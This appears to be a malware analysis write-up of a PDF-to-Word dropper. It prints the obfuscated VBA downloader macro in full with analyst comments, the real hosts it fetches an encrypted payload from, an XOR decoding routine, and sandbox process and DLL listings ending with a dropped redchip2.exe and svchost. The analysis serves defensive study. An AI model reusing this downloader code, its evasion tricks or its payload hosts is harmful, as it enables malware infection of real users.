9E7D71930975CD28CF3C9EC72BE6F154D8F0920E86C5BADB621DDD0D99957047    (PDF)
55073BA543D1A0736C423747C01A1365A380E7B4713FC27140741A391EF61CBB    (MSWORD)
760390F07CEFAFADECE0638A643D69964433041ABEAB09B65BFCDB922C047872    (EXE)

udurrani

INFO



DYNAMIC FLOW

PDF View




MACRO CODE

Extension CLSID Verification Host
' Module-level state shared by the macro procedures below. Analyst notes:
' several of these are read but never assigned anywhere in this listing
' (ArizonaSu, Vaucher, DRUFTINGProjectBBB), so they must be populated by
' code or form data outside this view -- the CreateObject ProgIDs in
' particular are not recoverable from this module alone.
' Never referenced in this listing; likely a leftover or a decoy string.
Public Const DRUFTINGSystem = "User-Agent"
' Late-bound object created from ArizonaSu(1); opened, written to and
' "savetofile"d in Assimptota6 (ProgID not visible here).
Public SubProperty As Object

' Middle fragment of the method name built in Assimptota6:
' "sav" + Sooopchik + "ile" = "savetofile". Splitting the literal keeps the
' full member name out of the module text.
Public Const Sooopchik = "etof"




' Holds the value read from CuPro's responseBody in Assimptota6.
Public DRUFTINGPokerFace As Variant
' Created from ArizonaSu(2); its Open method is called on DRUFTINGProject.
Public DRUFTINGGMAKO As Object
' Assigned from an environment lookup in WellNowYouAreReady; never read here.
Public DRUFTINGLAKOPPC As String
' Created from ArizonaSu(3); only its Environment member is used in view.
Public DRUFTINGPIRO_LOR As Object


' Counter used only as an obfuscated index/arithmetic helper (set to 12,
' halved for an index, then zeroed; incremented by 2 per download attempt).
Public ProjectDarvin As Integer
' Result of DRUFTINGPIRO_LOR.Environment(...); indexed like a collection.
Public DRUFTINGRDD2 As Object
' Assigned from a form label caption in WellNowYouAreReady; never read here.
Public smbi As String
' Never referenced in this listing.
Public DRUFTING2 As String
' Always 0; used only to disguise the literal index 3 as FreshID + 3.
Public Const FreshID = 0

' Array of strings passed to CreateObject and Environment; never filled in
' this listing, so the object types are unknown from here (TODO: locate the
' code that populates it).
Public ArizonaSu() As String
' Path-like string passed to WidthA and then opened via DRUFTINGGMAKO.
Public DRUFTINGProject As String
' ProgID string for CuPro; not assigned in this listing.
Public Vaucher As String
' Path handed to "savetofile" and to WidthA; not assigned in this listing.
Public DRUFTINGProjectBBB As String
' Late-bound object created from Vaucher; exposes Status and responseBody
' and has a method invoked by name from a form control caption.
Public CuPro As Object


' Filled by Split() in WellNowYouAreReady with the URL-like fragments of
' the literal there; MoveSheets iterates over it.
Public MovedPermanently() As String
' Built from a form caption plus one MovedPermanently entry; never read here.
Public DRUFTING4 As String








' Called from Assimptota6 right after the response body has been saved.
' WidthA is not defined anywhere in this listing: it receives the saved
' file path, DRUFTINGProject and a 32-character string literal, and
' DRUFTINGProject is opened immediately afterwards, so it presumably turns
' the saved file into DRUFTINGProject (possibly via the XOR routine Method1)
' -- TODO confirm against the rest of the project.
' FullPath and NumHoja are never read and the return value is never set.
Public Function Assimptota4(FullPath As String, NumHoja As Integer) As String
  WidthA DRUFTINGProjectBBB, DRUFTINGProject, "ZGJQwTKUfkEXpZQqKABSuCbd8WMrzM5A"


' DRUFTINGGMAKO comes from CreateObject(ArizonaSu(2)); its ProgID is not
' visible here, so what "Open" does with the file is an assumption to verify.
DRUFTINGGMAKO.Open (DRUFTINGProject)
   
End Function

' Not referenced by any procedure in this listing. RECT, g_cursorx,
' g_cursory, MenuRect and "IntersectR.ect" are all undefined here, and the
' last one is not even a valid identifier as printed (extraction artifact or
' deliberately broken). This reads as UI hit-testing code pasted in as
' filler to bulk up the module -- treat it as inert unless a caller is found.
Public Function CheckRectsMenu4() As Integer
    Dim rTemp As RECT, rMouse As RECT, i As Integer
    With rMouse
        .Left = g_cursorx
        .Right = .Left + 32
        .Top = g_cursory
        .Bottom = .Top + 1
    End With
    For i = 0 To UBound(MenuRect)
        If IntersectR.ect(rTemp, MenuRect(i), rMouse) Then
            CheckRectsMenu4 = i + 1
            Exit Function
        End If
    Next
End Function


' Called from MoveSheets as Assimptota6 "33", 3 once CuPro.Status is 200.
' Takes CuPro's response body, writes it to disk through SubProperty and
' hands off to Assimptota4. FullPath is unused; NumHoja only gates a
' branch that is never entered with the value 3 seen in this listing.
Public Function Assimptota6(FullPath As String, NumHoja As Integer) As String

' Not defined in this listing.
DRUFTINGProjectSpeed
' Late-bound call so the member name is a string rather than a direct call.
 CallByName SubProperty, "Open", VbMethod
' numExportadas is undefined here and NumHoja is 3 at the only visible call
' site, so this block (and its Spanish export message) is unreachable filler.
If NumHoja > 400 Then

    If numExportadas = 0 Then
        Assimptota6 = "No rows to export [No tiene filas por exportar]"
        Exit Function
    End If
End If

' Reads the raw response body of the object created from Vaucher.
 DRUFTINGPokerFace = CallByName(CuPro, "responseBody", VbGet)
 

    
' Write/"savetofile" with a mode argument of 2 is consistent with an
' ADODB.Stream-style object, but the ProgID (ArizonaSu(1)) is not visible
' here -- confirm. The method name is assembled as "sav" + "etof" + "ile".
 SubProperty.Write DRUFTINGPokerFace
CallByName SubProperty, "sav" + Sooopchik + "ile", VbMethod, DRUFTINGProjectBBB, 2
' Arguments are ignored by Assimptota4; it processes DRUFTINGProjectBBB.
Assimptota4 ".", 1
End Function



' Driver for the download attempts; all three parameters are unused (the
' caller passes "A", "B", "C"). Walks MovedPermanently, issues one request
' per iteration and stops at the first HTTP 200.
' Error flow: On Error GoTo d13 sends any error -- including the one raised
' below on a non-200 status -- to the label sitting on the Next statement,
' so a failure simply advances to the next entry. Per VBA's rules the
' handler stays active after that first jump, so a second error in the same
' call would not be trapped -- verify if exact failover behaviour matters.
Public Sub MoveSheets(sheetToMove As String, sheetAnchor As String, Assimptota6OrAfter As String)


' NOTE(review): this i is local to MoveSheets. SaveDataCSVToolStripMenuItem_Click
' indexes MovedPermanently(i) with its own undeclared i, so as printed every
' iteration may resolve to the same (first) entry -- confirm against the
' original module.
 Dim i
 On Error GoTo d13
For i = LBound(MovedPermanently) To UBound(MovedPermanently) Step 1
' 72 < 488, so the request branch inside the callee is always taken.
 SaveDataCSVToolStripMenuItem_Click 72
' Anything other than 200 is turned into a runtime error to trigger d13.
If CuPro.Status <> 200 Then
 Err.Raise 700 + vbObjectError, "A", "D"
End If
    
    
    
' Success: save and process the body, then leave without trying the rest.
    Assimptota6 "33", 3
 Exit Sub
d13:
Next
Exit Sub

    
End Sub




' Not referenced by any procedure in this listing; same undefined names
' (RECT, g_cursorx, g_cursory, AdRect, "IntersectR.ect") as CheckRectsMenu4.
' Looks like pasted hit-testing code used as filler -- treat as inert unless
' a caller is found elsewhere in the project.
Public Function CheckRectsAd() As Boolean
    Dim rTemp As RECT, rMouse As RECT, i As Integer
    With rMouse
        .Left = g_cursorx
        .Right = .Left + 32
        .Top = g_cursory
        .Bottom = .Top + 1
    End With
    If IntersectR.ect(rTemp, AdRect, rMouse) Then
        CheckRectsAd = True
        Exit Function
    End If
End Function




' Bitwise XOR of its two (Variant) arguments; Method1 uses it as the
' per-byte combiner of its repeating-key loop.
Public Function Ashnorog(Var1, Var2)
  Ashnorog = Var1 Xor Var2
  
End Function
' In-place repeating-key XOR over MethodParam2 using the bytes of
' MethodParam as the key (key byte = position Mod key length). Not called
' from any procedure in this listing; Assimptota4's call to the undefined
' WidthA with a 32-character literal is the likely consumer -- confirm.
' Byte arrays and a short key literal are a detection-relevant pattern for
' a macro that has just written a downloaded body to disk.
Public Sub Method1(MethodParam2() As Byte, MethodParam As String)

  
  Dim AhnLab2 As Long
  Dim AhnLab3 As Long
  Dim AhnLab5 As Long
  Dim AhnLab6 As Long
  Dim plusplus() As Byte
Dim AhnLab4 As Long
Dim plusplusLen As Long
  plusplusLen = Len(MethodParam)
' This ReDim is redundant: the StrConv assignment below replaces the array.
ReDim plusplus(plusplusLen)

' Key string to an ANSI byte array (0-based, Len(MethodParam) entries).
  plusplus = StrConv(MethodParam, vbFromUnicode)

  
  AhnLab2 = UBound(MethodParam2) + 1
  AhnLab5 = AhnLab2
  
  
  For AhnLab4 = 0 To (AhnLab2 - 1)
' aa and bb are never declared (no Option Explicit in view): implicit Variants.
  aa = plusplus(AhnLab4 Mod plusplusLen)
  bb = MethodParam2(AhnLab4)
  MethodParam2(AhnLab4) = Ashnorog(bb, aa)
    
' Percentage bookkeeping (AhnLab3/AhnLab6) is computed but never used --
' dead arithmetic that only pads the loop.
    If (AhnLab4 >= AhnLab6) Then
      AhnLab3 = Int((AhnLab4 / AhnLab5) * 100)
      AhnLab6 = (AhnLab5 * ((AhnLab3 + 1) / 100)) + 1
    End If
  Next
End Sub



' Issues one request on CuPro. The name mimics a WinForms event handler
' but it is called directly by MoveSheets with e = 72. The method actually
' invoked on CuPro is taken from a form control caption (Odish.ToggleButton1),
' so neither the verb nor the URL appears as a literal in this module.
Public Sub SaveDataCSVToolStripMenuItem_Click(e As Integer)
' i is not declared in this Sub and MoveSheets' i is local to it, so as
' printed this index is an implicit Variant (Empty -> element 0) -- confirm
' whether a module-level i exists elsewhere. DRUFTING4 is never read here.
       DRUFTING4 = Odish.ZK.Caption & MovedPermanently(i)
 ProjectDarvin = ProjectDarvin + 2
' ChiClass is a class module not included in this listing; its Challenge
' method is the only place a request could be opened in the visible flow
' (nothing in view calls an "open" on CuPro) -- TODO inspect it.
 Dim XIpotom2 As ChiClass
Set XIpotom2 = New ChiClass
' Always true for the only visible caller (e = 72); the Else branch is empty.
If e < 488 Then


 XIpotom2.Challenge "Swed", 13
CallByName CuPro, Odish.ToggleButton1.Caption, VbMethod
Set XIpotom2 = Nothing
 
Else

End If
    End Sub



' Setup routine for the downloader: creates the late-bound objects, builds
' the target list and hands control to MoveSheets. Nothing in this listing
' calls it, so the trigger (e.g. a document-open event) lives elsewhere.
' All ProgIDs come from ArizonaSu/Vaucher and form captions (Odish), none of
' which are assigned in view; the arithmetic on the indices (FreshID + 3,
' 1 + 2 + 3 - 4, ProjectDarvin / 2) just disguises constants 3, 2 and 6.
Public Sub WellNowYouAreReady()

' ActiveDocument.Kind = 0 (wdDocumentNotSpecified in Word). If this test
' fails CuPro stays Nothing and MoveSheets fails on CuPro.Status.
If ActiveDocument.Kind = 0 Then
Set CuPro = CreateObject(Vaucher)
End If
Set DRUFTINGPIRO_LOR = CreateObject(ArizonaSu(FreshID + 3))
' smbi is never read in this listing.
smbi = Odish.Label1.Caption

  
' The delimiter is a form control caption. If it is "V" the literal splits
' into three host/path fragments -- the request targets -- but the literal
' alone does not show the scheme or the full URL.
MovedPermanently = Split("integritycomputers.biz/6gfd43Vwebrus.net/6gfd43Vgth.co.uk/6gfd43", Odish.Command.Caption)
 Set SubProperty = CreateObject(ArizonaSu(1))
    
   Set DRUFTINGGMAKO = CreateObject(ArizonaSu(1 + 2 + 3 - 4))

' An .Environment(...) member indexed by name is consistent with
' WScript.Shell, but the ProgID (ArizonaSu(3)) is not visible -- confirm.
Set DRUFTINGRDD2 = DRUFTINGPIRO_LOR.Environment(ArizonaSu(4))


 ProjectDarvin = 12
' Reads one environment variable (named by ArizonaSu(6)); the value is
' stored in DRUFTINGLAKOPPC but never used in this listing -- presumably it
' feeds the save path built outside this view.
 DRUFTINGLAKOPPC = DRUFTINGRDD2(ArizonaSu(ProjectDarvin / 2))
 ProjectDarvin = ProjectDarvin - ProjectDarvin



' Arguments are ignored by MoveSheets.
     MoveSheets "A", "B", "C"


End Sub

DOWNLOAD ENCRYPTED PAYLOAD

DNS


3 WAY HANDSHAKE


GET


DOWNLOAD ENCRYPTED PAYLOAD


PAYLOAD


Since the binary does not call Wow64DisableWow64FsRedirection, the 32-bit process is subject to WOW64 file-system redirection and the following path is used
C:\Windows\SysWOW64\svchost.exe

HANDLES



Thu Apr 20 20:05:24 2017	 4444	 AcroRd32.exe -> belongsTo 1880
****************************************************


** 4444 (0x0000115C)
     -> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe}
     -> {C:\Windows\SysWOW64\ntdll.dll}
     -> {C:\Windows\syswow64\kernel32.dll}
     -> {C:\Windows\syswow64\KERNELBASE.dll}
     -> {C:\Windows\syswow64\USER32.dll}
     -> {C:\Windows\syswow64\GDI32.dll}
     -> {C:\Windows\syswow64\LPK.dll}
     -> {C:\Windows\syswow64\USP10.dll}
     -> {C:\Windows\syswow64\msvcrt.dll}
     -> {C:\Windows\syswow64\ADVAPI32.dll}
     -> {C:\Windows\SysWOW64\sechost.dll}
     -> {C:\Windows\syswow64\RPCRT4.dll}
     -> {C:\Windows\syswow64\SspiCli.dll}
     -> {C:\Windows\syswow64\CRYPTBASE.dll}
     -> {C:\Windows\syswow64\SHELL32.dll}
     -> {C:\Windows\syswow64\SHLWAPI.dll}
     -> {C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCP80.dll}
     -> {C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll}
     -> {C:\Windows\system32\IMM32.DLL}
     -> {C:\Windows\syswow64\MSCTF.dll}
     -> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.dll}
     -> {C:\Windows\system32\VERSION.dll}
     -> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGM.dll}
     -> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CoolType.dll}
     -> {C:\Windows\syswow64\ole32.dll}
     -> {C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\COMCTL32.dll}
     -> {C:\Windows\system32\WINMM.dll}
     -> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\BIB.dll}
     -> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ACE.dll}
     -> {C:\Windows\syswow64\OLEAUT32.dll}
     -> {C:\Windows\syswow64\CLBCatQ.DLL}
     -> {C:\Windows\system32\propsys.dll}
     -> {C:\Windows\system32\ntmarta.dll}
     -> {C:\Windows\syswow64\WLDAP32.dll}
     -> {C:\Windows\syswow64\SETUPAPI.dll}
     -> {C:\Windows\syswow64\CFGMGR32.dll}
     -> {C:\Windows\syswow64\DEVOBJ.dll}
     -> {C:\Windows\system32\CRYPTSP.dll}
     -> {C:\Windows\system32\rsaenh.dll}
     -> {C:\Windows\system32\RpcRtRemote.dll}
     -> {C:\Windows\system32\UxTheme.dll}
     -> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api}
     -> {C:\Windows\syswow64\profapi.dll}
     -> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api}
     -> {C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl}
     -> {C:\Windows\system32\MSIMG32.dll}
     -> {C:\Windows\SysWOW64\oleacc.dll}
     -> {C:\Windows\system32\Msftedit.dll}


Thu Apr 20 20:05:29 2017	 1680	 WINWORD.EXE -> belongsTo 4444
****************************************************


** 1680 (0x00000690)
     -> {C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE}
     -> {C:\Windows\SysWOW64\ntdll.dll}
     -> {C:\Windows\syswow64\kernel32.dll}
     -> {C:\Windows\syswow64\KERNELBASE.dll}
     -> {C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll}
     -> {C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\Comctl32.dll}
     -> {C:\Windows\syswow64\ADVAPI32.dll}
     -> {C:\Windows\syswow64\msvcrt.dll}
     -> {C:\Windows\SysWOW64\sechost.dll}
     -> {C:\Windows\syswow64\RPCRT4.dll}
     -> {C:\Windows\syswow64\SspiCli.dll}
     -> {C:\Windows\syswow64\CRYPTBASE.dll}
     -> {C:\Windows\syswow64\GDI32.dll}
     -> {C:\Windows\syswow64\USER32.dll}
     -> {C:\Windows\syswow64\LPK.dll}
     -> {C:\Windows\syswow64\USP10.dll}
     -> {C:\Windows\system32\IMM32.DLL}
     -> {C:\Windows\syswow64\MSCTF.dll}
     -> {C:\Program Files (x86)\Microsoft Office\Office14\wwlib.dll}
     -> {C:\Windows\syswow64\ole32.dll}
     -> {C:\Windows\syswow64\OLEAUT32.dll}
     -> {C:\Program Files (x86)\Microsoft Office\Office14\gfx.dll}
     -> {C:\Windows\system32\WTSAPI32.dll}
     -> {C:\Windows\system32\MSIMG32.dll}
     -> {C:\Program Files (x86)\Microsoft Office\Office14\oart.dll}
     -> {C:\Program Files (x86)\Common Files\Microsoft Shared\office14\mso.dll}
     -> {C:\Windows\system32\msi.dll}
     -> {C:\Windows\syswow64\SHELL32.dll}
     -> {C:\Windows\syswow64\SHLWAPI.dll}
     -> {C:\Windows\system32\apphelp.dll}
     -> {C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\Comctl32.dll}
     -> {C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf}
     -> {C:\Program Files (x86)\Microsoft Office\Office14\1033\wwintl.dll}
     -> {C:\Program Files (x86)\Common Files\Microsoft Shared\office14\1033\MSOINTL.DLL}
     -> {C:\Program Files (x86)\Common Files\Microsoft Shared\office14\MSORES.DLL}
     -> {C:\Windows\system32\DwmApi.DLL}
     -> {C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL}
     -> {C:\Windows\system32\UxTheme.DLL}
     -> {C:\Program Files (x86)\Common Files\Microsoft Shared\office14\riched20.dll}
     -> {C:\Windows\system32\mscoree.dll}
     -> {C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll}
     -> {C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC.DLL}
     -> {C:\Windows\system32\Winspool.DRV}
     -> {C:\Windows\system32\VERSION.dll}
     -> {C:\Windows\syswow64\CLBCatQ.DLL}
     -> {C:\Windows\system32\propsys.dll}
     -> {C:\Windows\system32\ntmarta.dll}
     -> {C:\Windows\syswow64\WLDAP32.dll}
     -> {C:\Windows\syswow64\SETUPAPI.dll}
     -> {C:\Windows\syswow64\CFGMGR32.dll}
     -> {C:\Windows\syswow64\DEVOBJ.dll}
     -> {C:\Windows\system32\CRYPTSP.dll}
     -> {C:\Windows\system32\rsaenh.dll}
     -> {C:\Windows\system32\RpcRtRemote.dll}
     -> {C:\Windows\System32\msxml6.dll}
     -> {C:\Windows\System32\bcrypt.dll}
     -> {C:\Windows\syswow64\profapi.dll}
     -> {C:\Windows\system32\SXS.DLL}
     -> {C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\Creator\x86\FPC_WordAddin_x86.dll}
     -> {C:\Windows\syswow64\COMDLG32.dll}
     -> {C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23688_none_5c0a8e35a00adeb9\gdiplus.dll}


Thu Apr 20 20:05:35 2017	 1520	 redchip2.exe -> belongsTo 1680
****************************************************


** 1520 (0x000005F0)
     -> {C:\Users\foo\AppData\Local\Temp\redchip2.exe}
     -> {C:\Windows\SysWOW64\ntdll.dll}
     -> {C:\Windows\syswow64\kernel32.dll}
     -> {C:\Windows\syswow64\KERNELBASE.dll}
     -> {C:\Windows\system32\CLUSAPI.dll}
     -> {C:\Windows\syswow64\msvcrt.dll}
     -> {C:\Windows\syswow64\RPCRT4.dll}
     -> {C:\Windows\syswow64\SspiCli.dll}
     -> {C:\Windows\syswow64\CRYPTBASE.dll}
     -> {C:\Windows\SysWOW64\sechost.dll}
     -> {C:\Windows\syswow64\ADVAPI32.dll}
     -> {C:\Windows\system32\cryptdll.dll}
     -> {C:\Windows\syswow64\WS2_32.dll}
     -> {C:\Windows\syswow64\NSI.dll}
     -> {C:\Windows\syswow64\GDI32.dll}
     -> {C:\Windows\syswow64\USER32.dll}
     -> {C:\Windows\syswow64\LPK.dll}
     -> {C:\Windows\syswow64\USP10.dll}
     -> {C:\Windows\system32\WINMM.dll}
     -> {C:\Windows\syswow64\SHELL32.dll}
     -> {C:\Windows\syswow64\SHLWAPI.dll}
     -> {C:\Windows\syswow64\CRYPT32.dll}
     -> {C:\Windows\syswow64\MSASN1.dll}
     -> {C:\Windows\system32\WinSCard.dll}
     -> {C:\Windows\system32\MPRAPI.dll}
     -> {C:\Windows\syswow64\WININET.dll}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll}
     -> {C:\Windows\system32\version.DLL}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll}
     -> {C:\Windows\syswow64\normaliz.DLL}
     -> {C:\Windows\syswow64\iertutil.dll}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll}
     -> {C:\Windows\syswow64\USERENV.dll}
     -> {C:\Windows\syswow64\profapi.dll}
     -> {C:\Windows\system32\Secur32.dll}
     -> {C:\Windows\system32\NTDSAPI.dll}
     -> {C:\Windows\syswow64\OLEAUT32.dll}
     -> {C:\Windows\syswow64\ole32.dll}
     -> {C:\Windows\syswow64\SETUPAPI.dll}
     -> {C:\Windows\syswow64\CFGMGR32.dll}
     -> {C:\Windows\syswow64\DEVOBJ.dll}
     -> {C:\Windows\system32\IMM32.DLL}
     -> {C:\Windows\syswow64\MSCTF.dll}
     -> {C:\Windows\syswow64\PsApi.DLL}
     -> {C:\Windows\system32\CRYPTSP.dll}
     -> {C:\Windows\system32\rsaenh.dll}
     -> {C:\Windows\system32\apphelp.dll}
     -> {C:\Windows\system32\ntmarta.dll}
     -> {C:\Windows\syswow64\WLDAP32.dll}


Thu Apr 20 20:05:35 2017	 2956	 svchost.exe -> belongsTo 1520
****************************************************


** 2956 (0x00000B8C)
     -> {C:\Windows\SysWOW64\svchost.exe}
     -> {C:\Windows\SysWOW64\ntdll.dll}
     -> {C:\Windows\syswow64\kernel32.dll}
     -> {C:\Windows\syswow64\KERNELBASE.dll}
     -> {C:\Windows\syswow64\msvcrt.dll}
     -> {C:\Windows\SysWOW64\sechost.dll}
     -> {C:\Windows\syswow64\RPCRT4.dll}
     -> {C:\Windows\syswow64\SspiCli.dll}
     -> {C:\Windows\syswow64\CRYPTBASE.dll}
     -> {C:\Windows\syswow64\USER32.dll}
     -> {C:\Windows\syswow64\GDI32.dll}
     -> {C:\Windows\syswow64\LPK.dll}
     -> {C:\Windows\syswow64\USP10.dll}
     -> {C:\Windows\syswow64\ADVAPI32.dll}
     -> {C:\Windows\system32\IMM32.DLL}
     -> {C:\Windows\syswow64\MSCTF.dll}





Thu Apr 20 20:09:03 2017	 3212	 iexplore.exe -> belongsTo 2944
****************************************************


** 3212 (0x00000C8C)
     -> {C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE}
     -> {C:\Windows\SysWOW64\ntdll.dll}
     -> {C:\Windows\syswow64\kernel32.dll}
     -> {C:\Windows\syswow64\KERNELBASE.dll}
     -> {C:\Windows\syswow64\msvcrt.dll}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll}
     -> {C:\Windows\syswow64\advapi32.DLL}
     -> {C:\Windows\SysWOW64\sechost.dll}
     -> {C:\Windows\syswow64\RPCRT4.dll}
     -> {C:\Windows\syswow64\SspiCli.dll}
     -> {C:\Windows\syswow64\CRYPTBASE.dll}
     -> {C:\Windows\syswow64\iertutil.dll}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll}
     -> {C:\Windows\system32\version.DLL}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll}
     -> {C:\Windows\syswow64\user32.DLL}
     -> {C:\Windows\syswow64\GDI32.dll}
     -> {C:\Windows\syswow64\LPK.dll}
     -> {C:\Windows\syswow64\USP10.dll}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll}
     -> {C:\Windows\syswow64\normaliz.DLL}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll}
     -> {C:\Windows\syswow64\shlwapi.DLL}
     -> {C:\Windows\system32\IMM32.DLL}
     -> {C:\Windows\syswow64\MSCTF.dll}
     -> {C:\Windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll}
     -> {C:\Windows\syswow64\shell32.DLL}
     -> {C:\Windows\system32\IEFRAME.dll}
     -> {C:\Windows\syswow64\ole32.dll}
     -> {C:\Windows\syswow64\OLEAUT32.dll}
     -> {C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll}
     -> {C:\Program Files (x86)\Internet Explorer\IEShims.dll}
     -> {C:\Windows\syswow64\comdlg32.dll}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll}
     -> {C:\Windows\syswow64\urlmon.dll}
     -> {C:\Windows\syswow64\WININET.dll}
     -> {C:\Windows\syswow64\USERENV.dll}
     -> {C:\Windows\syswow64\profapi.dll}
     -> {C:\Windows\system32\Secur32.dll}
     -> {C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll}
     -> {C:\Windows\syswow64\WS2_32.dll}
     -> {C:\Windows\syswow64\NSI.dll}
     -> {C:\Windows\system32\mswsock.dll}
     -> {C:\Windows\System32\wship6.dll}
     -> {C:\Windows\system32\IPHLPAPI.DLL}
     -> {C:\Windows\system32\WINNSI.DLL}
     -> {C:\Windows\system32\CRYPTSP.dll}
     -> {C:\Windows\system32\rsaenh.dll}
     -> {C:\Windows\system32\RpcRtRemote.dll}
     -> {C:\Windows\syswow64\CLBCatQ.DLL}
     -> {C:\Program Files (x86)\Internet Explorer\ieproxy.dll}
     -> {C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll}
     -> {C:\Windows\system32\bcrypt.dll}
     -> {C:\Windows\SysWOW64\bcryptprimitives.dll}
     -> {C:\Windows\system32\MSHTML.dll}
     -> {C:\Windows\system32\d2d1.dll}
     -> {C:\Windows\system32\DWrite.dll}
     -> {C:\Windows\system32\dxgi.dll}
     -> {C:\Windows\system32\dwmapi.dll}
     -> {C:\Windows\syswow64\WINTRUST.dll}
     -> {C:\Windows\syswow64\CRYPT32.dll}
     -> {C:\Windows\syswow64\MSASN1.dll}
     -> {C:\Windows\system32\d3d11.dll}
     -> {C:\Windows\system32\vm3dum_10.dll}
     -> {C:\Windows\system32\WINMM.dll}
     -> {C:\Windows\system32\dbghelp.dll}
     -> {C:\Windows\system32\apphelp.dll}
     -> {C:\Windows\system32\MLANG.dll}
     -> {C:\Windows\system32\PROPSYS.dll}
     -> {C:\Windows\system32\DNSAPI.dll}
     -> {C:\Windows\System32\wshtcpip.dll}
     -> {C:\Windows\system32\rasadhlp.dll}
     -> {C:\Windows\system32\IEUI.dll}
     -> {C:\Windows\System32\fwpuclnt.dll}
     -> {C:\Windows\system32\UxTheme.dll}
     -> {C:\Windows\SysWOW64\jscript9.dll}
     -> {C:\Windows\SysWOW64\ieapfltr.dll}
     -> {C:\Windows\system32\msimtf.dll}
     -> {C:\Windows\System32\msxml6.dll}
     -> {C:\Windows\SysWOW64\uiautomationcore.dll}
     -> {C:\Windows\syswow64\PSAPI.DLL}
     -> {C:\Windows\SysWOW64\OLEACC.dll}
     -> {C:\Windows\system32\credssp.dll}
     -> {C:\Windows\SysWOW64\schannel.dll}
     -> {C:\Windows\system32\ncrypt.dll}
     -> {C:\Windows\system32\GPAPI.dll}
     -> {C:\Windows\system32\cryptnet.dll}
     -> {C:\Windows\syswow64\WLDAP32.dll}
     -> {C:\Windows\system32\SensApi.dll}
     -> {C:\Windows\system32\windowscodecs.dll}
     -> {C:\Windows\system32\XmlLite.dll}
     -> {C:\Windows\system32\WINHTTP.dll}
     -> {C:\Windows\system32\webio.dll}
     -> {C:\Windows\system32\dhcpcsvc.DLL}
     -> {C:\Windows\system32\dhcpcsvc6.DLL}
     -> {C:\Windows\syswow64\CFGMGR32.dll}




Thu Apr 20 20:13:21 2017	 2920	 iexplore.exe -> belongsTo 2944
****************************************************


** 2920 (0x00000B68)
     -> {C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE}
     -> {C:\Windows\SysWOW64\ntdll.dll}
     -> {C:\Windows\syswow64\kernel32.dll}
     -> {C:\Windows\syswow64\KERNELBASE.dll}
     -> {C:\Windows\syswow64\msvcrt.dll}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll}
     -> {C:\Windows\syswow64\advapi32.DLL}
     -> {C:\Windows\SysWOW64\sechost.dll}
     -> {C:\Windows\syswow64\RPCRT4.dll}
     -> {C:\Windows\syswow64\SspiCli.dll}
     -> {C:\Windows\syswow64\CRYPTBASE.dll}
     -> {C:\Windows\syswow64\iertutil.dll}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll}
     -> {C:\Windows\system32\version.DLL}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll}
     -> {C:\Windows\syswow64\user32.DLL}
     -> {C:\Windows\syswow64\GDI32.dll}
     -> {C:\Windows\syswow64\LPK.dll}
     -> {C:\Windows\syswow64\USP10.dll}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll}
     -> {C:\Windows\syswow64\normaliz.DLL}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll}
     -> {C:\Windows\syswow64\shlwapi.DLL}
     -> {C:\Windows\system32\IMM32.DLL}
